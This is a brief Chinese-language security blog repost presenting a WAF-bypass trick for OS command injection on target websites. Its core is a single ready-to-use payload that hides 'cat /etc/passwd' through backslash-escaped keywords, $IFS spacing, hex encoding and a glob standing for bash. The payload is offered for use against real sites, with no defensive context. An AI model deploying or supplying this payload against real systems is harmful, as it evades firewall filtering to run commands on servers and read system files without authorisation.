命令注入绕过一个小技巧
2023-9-17 20:2:0 Author: Ots安全(查看原文) 阅读量:18 收藏

有时,您可能会在目标网站上获得操作系统命令注入,但由于“echo”、“/etc/”、“cat”、“passwd”等受限关键字,有效负载可能会被 Web 应用程序防火墙 (WAF) 阻止。这是一种成功传送有效负载的 WAF 旁路技术。

e\c\h\o$IFS-e$IFS'\x63\x61\x74\x20\x2F\x65\x74\x63\x2F\x70\x61\x73\x73\x77\x64'|/???/\b**\h

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247501430&idx=2&sn=36561bbe4bf78b3eb4e97bda5e9f0842&chksm=9bad8f3dacda062bb0f747c8cd118e31293d67fea53494ecbd3f3a972249c19377959bc05ea5&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh